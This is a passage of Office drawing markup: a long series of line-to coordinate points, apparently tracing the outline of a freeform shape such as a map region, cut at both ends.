                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13279" y="9576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13229" y="9359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13261" y="9155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13210" y="9004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13002" y="8847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12884" y="8864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12842" y="8970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12729" y="8953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12648" y="8851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12478" y="8863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12758" y="8354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12950" y="7932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13221" y="7790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13497" y="7725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13561" y="7602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13700" y="7573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13756" y="7696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13874" y="7622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14030" y="7494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13909" y="7427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13938" y="7063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14086" y="6910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14273" y="7066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14326" y="6792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14271" y="6644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14338" y="6580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14449" y="6822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14417" y="7021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14404" y="7255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14396" y="7531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14295" y="7634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14335" y="7711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14321" y="7844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14406" y="8092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14653" y="8433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14821" y="8654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14917" y="8751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14968" y="8524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="8342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15008" y="8228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14926" y="8028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15018" y="7858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14939" y="7810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14887" y="7659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14954" y="7607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14808" y="7376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14700" y="7396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14655" y="7336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14635" y="7132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14584" y="7018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14690" y="6976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14705" y="6866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14778" y="6900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14848" y="6659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15020" y="6684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14986" y="6602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14990" y="6444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14981" y="6272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15012" y="6211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15047" y="5971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15163" y="5900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15136" y="5853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15072" y="5809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15013" y="5801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14869" y="5732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14752" y="5710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14818" y="5656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14806" y="5541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14766" y="5464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14678" y="5432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14688" y="5348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14736" y="5400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14810" y="5413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14831" y="5343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14892" y="5311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14966" y="5348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15057" y="5311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15136" y="5307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15172" y="5262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15151" y="5218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14998" y="5117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15028" y="5023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14985" y="4929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14783" y="4935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14680" y="5052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14801" y="5116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14741" y="5122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14646" y="5053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14407" y="5068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14209" y="5089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14094" y="5099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13923" y="5156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13852" y="5240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13687" y="5321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13729" y="5393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13850" y="5444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13838" y="5531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13645" y="5477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13574" y="5557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13461" y="5592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13380" y="5652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13338" y="5722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13244" y="5718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13167" y="5612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13079" y="5577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12965" y="5607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12781" y="5735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12574" y="5679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12478" y="5607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11967" y="5659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11923" y="5747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12019" y="5885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11918" y="5885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11891" y="5940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11765" y="5913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11679" y="5976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11568" y="5917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11549" y="6099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11441" y="6043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11345" y="5920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11367" y="5848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11324" y="5745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11224" y="5666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11140" y="5674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11026" y="5651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11031" y="5777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="5755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10788" y="5678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10620" y="5646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10532" y="5666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10504" y="5706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492" y="5599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10440" y="5626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10371" y="5577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10312" y="5545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10359" y="5503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10502" y="5425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10563" y="5383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10583" y="5299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10554" y="5237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10468" y="5149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10344" y="5131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10297" y="5163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10305" y="5084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10219" y="5043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10285" y="5015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10233" y="4952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10118" y="4996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10056" y="5052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10019" y="5116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9943" y="5094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9814" y="5146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9795" y="5102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9681" y="5080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9645" y="5116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9526" y="5094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9400" y="5132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9349" y="5114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9236" y="5186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9218" y="5277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9112" y="5250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9014" y="5191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8920" y="5178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8802" y="5326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8748" y="5466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8731" y="5338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8635" y="5291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8516" y="5296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8447" y="5405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8423" y="5348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8560" y="5233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8608" y="5146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8586" y="5134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8506" y="5233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8346" y="5267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8295" y="5413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8132" y="5521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8071" y="5604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8113" y="5651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8009" y="5725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7967" y="5823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7864" y="5856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7789" y="5915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7701" y="5908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7634" y="5940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7595" y="5875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7874" y="5760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7980" y="5686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8007" y="5565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8194" y="5393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8273" y="5292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8290" y="5233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="5159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8499" y="5084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8438" y="4972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8384" y="4974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8235" y="5062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8039" y="5109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7994" y="5148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7905" y="5260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7826" y="5306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7859" y="5363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7832" y="5390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7802" y="5494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7701" y="5535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7715" y="5254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7708" y="5164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7651" y="5015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7583" y="5030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7531" y="5136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7391" y="5163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7445" y="5048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7332" y="5030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7272" y="4951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7196" y="4952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7178" y="4887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7302" y="4870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7289" y="4831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7060" y="4755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6932" y="4698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6821" y="4744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6752" y="4686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6792" y="4617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6885" y="4570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6932" y="4621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7013" y="4545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7018" y="4387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6925" y="4471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6816" y="4494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6730" y="4585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6604" y="4612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6646" y="4535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6641" y="4483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6442" y="4434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6327" y="4528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6275" y="4499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6353" y="4318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6284" y="4308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6215" y="4375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6132" y="4402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6169" y="4338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6210" y="4244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6462" y="4138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6578" y="4005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6604" y="4037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6509" y="4323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6575" y="4390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6679" y="4409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6792" y="4355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6863" y="4282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7021" y="4025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7046" y="3882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7147" y="3772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7083" y="3742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7194" y="3663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7243" y="3708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7373" y="3540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7343" y="3469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7359" y="3390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7225" y="3348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7248" y="3272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7194" y="3185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7018" y="3084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6920" y="3018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6651" y="2932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6471" y="2858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6365" y="2767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6322" y="2633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6258" y="2589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5902" y="2644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5730" y="2690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5600" y="2791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5585" y="2872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5691" y="2966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5577" y="3027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5338" y="3126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5142" y="3229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4991" y="3291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4964" y="3372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5065" y="3377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5020" y="3469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5148" y="3466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5398" y="3417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5413" y="3476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5575" y="3488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5681" y="3402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5809" y="3330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="3321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6132" y="3404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6245" y="3464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6349" y="3432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6457" y="3459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6489" y="3540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6398" y="3636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6326" y="3661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6296" y="3634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6132" y="3550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6040" y="3525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5949" y="3520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5794" y="3590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5636" y="3622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5570" y="3702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5476" y="3767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5493" y="3863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5540" y="3959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5543" y="4074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5464" y="4173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5376" y="4131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5376" y="4063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5410" y="3981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5397" y="3904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5365" y="3835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5270" y="3872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208" y="3936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5223" y="3954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5132" y="3981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5013" y="4013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5018" y="3957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5146" y="3858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5105" y="3809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5015" y="3809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4898" y="3850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4767" y="3914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4742" y="3829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4680" y="3838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4701" y="3764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4740" y="3744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4787" y="3659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4769" y="3584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4742" y="3489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4720" y="3452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4781" y="3400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4875" y="3299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4853" y="3269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4861" y="3202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4914" y="3188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4983" y="3104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5040" y="3089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5121" y="3050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5200" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5173" y="3099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5220" y="3102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5262" y="3059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5307" y="3040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5344" y="3050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5420" y="3035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5407" y="2990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5378" y="2974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5402" y="2917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5368" y="2907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5334" y="2905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5186" y="2941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5090" y="2990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5008" y="3013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4946" y="3045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4903" y="3015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4942" y="2993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4971" y="2934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4949" y="2927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4991" y="2865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4998" y="2781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4845" y="2769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4834" y="2740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4851" y="2688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4875" y="2631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4787" y="2638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4831" y="2491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4944" y="2409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4786" y="2469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4929" y="2336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4993" y="2249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4902" y="2281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4750" y="2407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4641" y="2483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4449" y="2606"/>
